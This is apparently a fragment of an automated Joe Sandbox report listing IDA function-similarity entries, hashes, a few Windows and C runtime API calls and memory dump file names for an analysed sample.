                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: ErrorFileLastWrite
                      • String ID: U
                      • API String ID: 442123175-4171548499
                      • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                      • Instruction ID: 915d643fa90e1e6524d91458d67fd12db3fc2895802df4297a9d2bbc896810e0
                      • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                      • Instruction Fuzzy Hash: D941A222A19A4185DB20CFA9E4843AE77A1FB887D4F844131EF4E87798DF3CD441CB40
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID: csm
                      • API String ID: 3997070919-1018135373
                      • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                      • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                      • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                      • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                      APIs
                        • Part of subcall function 00007FF8BFB23A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FF8BFB23A63
                      • __GSHandlerCheckCommon.LIBCMT ref: 00007FF8BFB30993
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: CheckCommonHandler__except_validate_context_record
                      • String ID: csm$f
                      • API String ID: 1543384424-629598281
                      • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                      • Instruction ID: 1dea1bb92eae1292d7fbdba62f9e4fbad9de16168e5fe6d199c80cd86d58efd8
                      • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                      • Instruction Fuzzy Hash: C611B132A5879585EB109FAAE4411ADBB64EF45FC4F488135EF8807B5ACE38D861C700
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: TimerWaitable
                      • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                      • API String ID: 1823812067-484248852
                      • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                      • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                      • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                      • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                      APIs
                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8BFB2112F), ref: 00007FF8BFB239E0
                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8BFB2112F), ref: 00007FF8BFB23A21
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: ExceptionFileHeaderRaise
                      • String ID: csm
                      • API String ID: 2573137834-1018135373
                      • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                      • Instruction ID: 9a0d0a611875498c0794c582ac123c583cd019ec0430cdf9747b04f88cef8fd1
                      • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                      • Instruction Fuzzy Hash: A911FB32618B8182EB618B59F440269BBE5FB89B94F584235DF8D07B68DF3DD561CB00
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: TimerWaitable
                      • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                      • API String ID: 1823812067-3336177065
                      • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                      • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                      • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                      • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: Heap$FreeProcess
                      • String ID:
                      • API String ID: 3859560861-0
                      • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                      • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                      • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                      • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710